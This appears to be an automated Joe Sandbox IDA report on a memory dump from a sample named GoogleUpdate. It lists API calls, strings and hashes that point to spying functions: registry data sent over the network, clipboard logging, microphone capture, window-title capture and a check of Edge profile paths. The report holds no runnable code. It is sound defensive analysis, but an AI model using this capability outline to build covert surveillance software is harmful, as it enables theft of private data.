                                • Instruction Fuzzy Hash: 2721657160420067C618B776DC179AE32A89F51308F40447FF552772D3EE7D9A05869F
                                APIs
                                • GetSystemTimes.KERNEL32(?,?,?,004724A0,?,?,00000000), ref: 004197F6
                                • Sleep.KERNEL32(000003E8,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,0041588A), ref: 00419801
                                • GetSystemTimes.KERNEL32(?,?,?,?,?,00000000), ref: 00419816
                                • __aulldiv.LIBCMT ref: 0041987D
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: SystemTimes$Sleep__aulldiv
                                • String ID:
                                • API String ID: 188215759-0
                                • Opcode ID: a10989dffdb38c1c471ca41a2490fa3084ff35cad8f91966e756ab2f281e4d8f
                                • Instruction ID: 145d7891b6f1dee57345c91865aa58c1fa38592630094fdfab7f37f82c20bed6
                                • Opcode Fuzzy Hash: a10989dffdb38c1c471ca41a2490fa3084ff35cad8f91966e756ab2f281e4d8f
                                • Instruction Fuzzy Hash: 791160735443446BC308FAB5CC95DEB77ACEBC5388F040A3EF54682091EE39DA488BA5
                                APIs
                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,00445A3C,00000000,00000000,00000000,00000000,?,00445D68,00000006,FlsSetValue), ref: 00445AC7
                                • GetLastError.KERNEL32(?,00445A3C,00000000,00000000,00000000,00000000,?,00445D68,00000006,FlsSetValue,0045C110,0045C118,00000000,00000364,?,004457F7), ref: 00445AD3
                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00445A3C,00000000,00000000,00000000,00000000,?,00445D68,00000006,FlsSetValue,0045C110,0045C118,00000000), ref: 00445AE1
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: LibraryLoad$ErrorLast
                                • String ID:
                                • API String ID: 3177248105-0
                                • Opcode ID: 6ca79951660ad3b6e96c8c42d18b75cc874aa2905662dd76989ddfa9726cc4c5
                                • Instruction ID: dabcc1aa4f00c9d7d6140ee010913d89a9079070269616da1364236c98588597
                                • Opcode Fuzzy Hash: 6ca79951660ad3b6e96c8c42d18b75cc874aa2905662dd76989ddfa9726cc4c5
                                • Instruction Fuzzy Hash: 8501FC32601B276BDF218A78AC84D577758EF05B617110635F906E3242D724DC01C6E8
                                APIs
                                • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00436CD1
                                • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00436CD6
                                • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00436CDB
                                  • Part of subcall function 004381DA: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 004381EB
                                • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00436CF0
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                • String ID:
                                • API String ID: 1761009282-0
                                • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                • Instruction ID: fe0629a2579d5eb29aad24ff52ac89f8c4d28ee3f0e2161d733d9faf058f7893
                                • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                • Instruction Fuzzy Hash: 12C00254040342742C5077B622062AEA350A8AE38DFA7B4CFB892171038D0D440B953F
                                APIs
                                • __startOneArgErrorHandling.LIBCMT ref: 004401ED
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorHandling__start
                                • String ID: pow
                                • API String ID: 3213639722-2276729525
                                • Opcode ID: 28648d1c5639a1d5ffd860c5db5a803017559560979bfd47f5832c4e42ec8e44
                                • Instruction ID: 9a83a7e01686381b8a8ce0b853cf5bc52d75b03c70b61edc7fb1f4b11142e615
                                • Opcode Fuzzy Hash: 28648d1c5639a1d5ffd860c5db5a803017559560979bfd47f5832c4e42ec8e44
                                • Instruction Fuzzy Hash: 21518A60A842018AFB117714CA4137B3B90EB40701F248DABE5D2563EAEB7D8CB5DA4F
                                APIs
                                • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00412737
                                  • Part of subcall function 00412446: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 004124AD
                                  • Part of subcall function 00412446: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 004124DC
                                  • Part of subcall function 00404A81: send.WS2_32(FFFFFFFF,00000000,00000000,00000000,0040545D,?,?,00000004,?,?,00000004,?,00471E90,?), ref: 00404B16
                                • RegCloseKey.ADVAPI32(00000000,00463050,00463050,00469654,00469654,00000071), ref: 004128A5
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseEnumInfoOpenQuerysend
                                • String ID: P0F
                                • API String ID: 3114080316-3540264436
                                • Opcode ID: 15564e17430f72c0e31f05e5d93a2297141348888183f3aaa028a9435fa84657
                                • Instruction ID: 2d28d635716c3df90d830f6dadb90dee404f775c6aa34bcd6e72966151b01206
                                • Opcode Fuzzy Hash: 15564e17430f72c0e31f05e5d93a2297141348888183f3aaa028a9435fa84657
                                • Instruction Fuzzy Hash: 9D41F3306442405BC324F625D992AEFB299AFD1344F40893FB44A631D2EEBC5D4A86AE
                                APIs
                                  • Part of subcall function 00445725: GetLastError.KERNEL32(00000020,?,00438595,?,?,?,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B), ref: 00445729
                                  • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                  • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B,?,00000041,00000000,00000000), ref: 0044579D
                                  • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                  • Part of subcall function 0044C257: _abort.LIBCMT ref: 0044C289
                                  • Part of subcall function 0044C257: _free.LIBCMT ref: 0044C2BD
                                  • Part of subcall function 0044BECC: GetOEMCP.KERNEL32(00000000,?,?,0044C155,?), ref: 0044BEF7
                                • _free.LIBCMT ref: 0044C1B0
                                • _free.LIBCMT ref: 0044C1E6
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$ErrorLast_abort
                                • String ID: pF
                                • API String ID: 2991157371-2973420481
                                • Opcode ID: bab6f42d0b0ad1c45baa8cd6d2334fb0c97687a18f596a08bb1afdde7ab90e7e
                                • Instruction ID: fe15ecdc59135b682bea8f5676c8c6c36af8c828548cffef148b997f3b02a595
                                • Opcode Fuzzy Hash: bab6f42d0b0ad1c45baa8cd6d2334fb0c97687a18f596a08bb1afdde7ab90e7e
                                • Instruction Fuzzy Hash: 3431E931901104AFFB50EF9AD481B5A77F4DF40325F29409FE5149B252EB7A9D40CF48
                                APIs
                                  • Part of subcall function 00432525: __onexit.LIBCMT ref: 0043252B
                                • __Init_thread_footer.LIBCMT ref: 0040A6E3
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: Init_thread_footer__onexit
                                • String ID: [End of clipboard]$[Text copied to clipboard]
                                • API String ID: 1881088180-3686566968
                                • Opcode ID: 44f911444ffa7c3397639edde977d3ee6651e3735ca6fd54ab2b9edf5bc924b1
                                • Instruction ID: 89f5e7c07999504d217297f9a041c68b3e0b8c5632e5b70e4a6c966e9d45e494
                                • Opcode Fuzzy Hash: 44f911444ffa7c3397639edde977d3ee6651e3735ca6fd54ab2b9edf5bc924b1
                                • Instruction Fuzzy Hash: 42218D31A002055ACB04FBA5D892DEDB378AF54308F10453FF506771D2EF38AE4A8A8D
                                APIs
                                • GetACP.KERNEL32(?,20001004,?,00000002), ref: 0044EDF2
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: ACP$OCP
                                • API String ID: 0-711371036
                                • Opcode ID: 2f6255c43d422f9ec28f5694223862b2eeac92ff2acac738a800f64e00dd4497
                                • Instruction ID: ce4b6ecbf16ce97eee8671cf775368e41a8ae942868fb71505acbacd33d5bec2
                                • Opcode Fuzzy Hash: 2f6255c43d422f9ec28f5694223862b2eeac92ff2acac738a800f64e00dd4497
                                • Instruction Fuzzy Hash: 4F21F1E2E00102A2FB348B67CC01BAB72A6FF54B51F568426E90AD7300EB3ADD41C35C
                                APIs
                                • GetWindowTextW.USER32(?,?,0000012C), ref: 00415B2E
                                • IsWindowVisible.USER32(?), ref: 00415B37
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: Window$TextVisible
                                • String ID: (%G
                                • API String ID: 1670992164-3377777310
                                • Opcode ID: fd2ff7ff3275d3c7faaa283d4d65487a7059631aa5508a7a24a326fc3211d187
                                • Instruction ID: 7bdbcb6602ffb42e5ce2137d58ff1a132c15f169860b2e192372582f8912ca7a
                                • Opcode Fuzzy Hash: fd2ff7ff3275d3c7faaa283d4d65487a7059631aa5508a7a24a326fc3211d187
                                • Instruction Fuzzy Hash: E42166315182019BC314FB61D891EEFB7E9AF94304F50493FF49A920E2FF349A49CA5A
                                APIs
                                • @_EH4_CallFilterFunc@8.LIBCMT ref: 0043A47A
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: CallFilterFunc@8
                                • String ID: @F$@F
                                • API String ID: 4062629308-3436687868
                                • Opcode ID: 16cbe90923eaebb00dd39f36306d65f0abe7ab86164c1207374e317e2438dedd
                                • Instruction ID: d046661977b9f70fa2c81c6cfd40d9a104c7fef52231e330e595ae3c7a73c1ff
                                • Opcode Fuzzy Hash: 16cbe90923eaebb00dd39f36306d65f0abe7ab86164c1207374e317e2438dedd
                                • Instruction Fuzzy Hash: 2F214C3165020056D7186B799D0636F33915F5D338F28A31FF8A18B3E1E7BC8962860F
                                APIs
                                • @_EH4_CallFilterFunc@8.LIBCMT ref: 0043A8BC
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: CallFilterFunc@8
                                • String ID: @F$@F
                                • API String ID: 4062629308-3436687868
                                • Opcode ID: 05b9a46a5ff75a344cafbd81f1c8e321827cbd969dec9deaf21c8b585dac50da
                                • Instruction ID: 70967ea4cb1e6682f5d06301c8bd88165fdf16009f8cb562ef1cc0c82826ef49
                                • Opcode Fuzzy Hash: 05b9a46a5ff75a344cafbd81f1c8e321827cbd969dec9deaf21c8b585dac50da
                                • Instruction Fuzzy Hash: 4C212531A5021086C71CBB799C0236E7391AF4D338F28675FF8A29A2D1E77C8953864F
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free
                                • String ID: XF
                                • API String ID: 269201875-1082896132
                                • Opcode ID: cb74daebedeac94c0edd9e9a4f608c47af35d50e83ab7986da7a67bf282e73af
                                • Instruction ID: 29f128b94e4315e8473d4fe5e2203e9150e620d95e20f300bbe5d6479d49c613
                                • Opcode Fuzzy Hash: cb74daebedeac94c0edd9e9a4f608c47af35d50e83ab7986da7a67bf282e73af
                                • Instruction Fuzzy Hash: FD11B4B1A402005EE7205F2ABC45B5632946F54734F165A37F9A0EB3E0F3B8C8854B8B
                                APIs
                                • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00432D8F
                                • ___raise_securityfailure.LIBCMT ref: 00432E76
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: FeaturePresentProcessor___raise_securityfailure
                                • String ID: (F
                                • API String ID: 3761405300-3109638091
                                • Opcode ID: 8d70a3cd03553c2d68efa77227729d50617932ca87f7888c32547dfbcc783ade
                                • Instruction ID: 494dc9d0fce29d31cb3ef34e393fed80e8221b4646dfbf54f91bf1ae82b1ca01
                                • Opcode Fuzzy Hash: 8d70a3cd03553c2d68efa77227729d50617932ca87f7888c32547dfbcc783ade
                                • Instruction Fuzzy Hash: 8C21F0BD500205DEE700DF16E9856403BE4BB49314F20943AE9088B3A1F3F669918F9F
                                APIs
                                • GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: LocalTime
                                • String ID: | $%02i:%02i:%02i:%03i
                                • API String ID: 481472006-2430845779
                                • Opcode ID: a67c926593161fd0d94068773a7f546b8f59043c1d86e2b9fa0726e697ac87bd
                                • Instruction ID: bce8772fa89f7f7ff9e68bb522557632f538b64cb503c22793e2f51f4d03e72f
                                • Opcode Fuzzy Hash: a67c926593161fd0d94068773a7f546b8f59043c1d86e2b9fa0726e697ac87bd
                                • Instruction Fuzzy Hash: 68117F315042015AC304FBA5D8518EBB3E8AB94308F500A3FF895A21E2FF3CDA49C65A
                                APIs
                                • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0041209B
                                • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 004120D1
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: QueryValue
                                • String ID: P0F
                                • API String ID: 3660427363-3540264436
                                • Opcode ID: c6eb32ecf86134c96b4320637183a1ff6d77c95426d782a482a776d7527dd5bc
                                • Instruction ID: 333f44122c6306c69f78a99928583bd7e211529a197e6eb40258ce4aa2bc4044
                                • Opcode Fuzzy Hash: c6eb32ecf86134c96b4320637183a1ff6d77c95426d782a482a776d7527dd5bc
                                • Instruction Fuzzy Hash: 5101DFB6A0010CBFEB14DB91DC06EFE7BBDEB48210F00017AFA04E2200E6B16F0096B4
                                APIs
                                  • Part of subcall function 00445725: GetLastError.KERNEL32(00000020,?,00438595,?,?,?,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B), ref: 00445729
                                  • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                  • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B,?,00000041,00000000,00000000), ref: 0044579D
                                  • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                • _abort.LIBCMT ref: 0044C289
                                • _free.LIBCMT ref: 0044C2BD
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLast_abort_free
                                • String ID: pF
                                • API String ID: 289325740-2973420481
                                • Opcode ID: 27a83d5959e399e126d66fc0e9bc80bad5e8b5edace6ebc33031c21e2b203fc3
                                • Instruction ID: 681b650f5022ba5d363f9e5fe3477a26ea07511fc4476d54e9c473318faef7cf
                                • Opcode Fuzzy Hash: 27a83d5959e399e126d66fc0e9bc80bad5e8b5edace6ebc33031c21e2b203fc3
                                • Instruction Fuzzy Hash: 2701CC75D02A319BE7B19F9A944165AB760BF04710B1D025BF96473381D7FC29418FCD
                                APIs
                                • waveInPrepareHeader.WINMM(00689C38,00000020,?,?,00473A38,00471E78,?,00000000,004019F5), ref: 00401829
                                • waveInAddBuffer.WINMM(00689C38,00000020,?,00000000,004019F5), ref: 0040183F
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: wave$BufferHeaderPrepare
                                • String ID: 7i
                                • API String ID: 2315374483-1667622458
                                • Opcode ID: 27540f122eb6a60785947e09fd395fa0183dfc65a449e97ebebab49f2f555e0b
                                • Instruction ID: 3a660176e7f8b230147204ba984e124cfbcdafa7022ac6de76214ba255081ced
                                • Opcode Fuzzy Hash: 27540f122eb6a60785947e09fd395fa0183dfc65a449e97ebebab49f2f555e0b
                                • Instruction Fuzzy Hash: 2F01AD76300205AFD7009F79EC44A29BBB9FB49314701813AF809C3772EB75AC118B98
                                APIs
                                • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000,?,?,?,?,?,?,0040B5A1), ref: 0040B49A
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
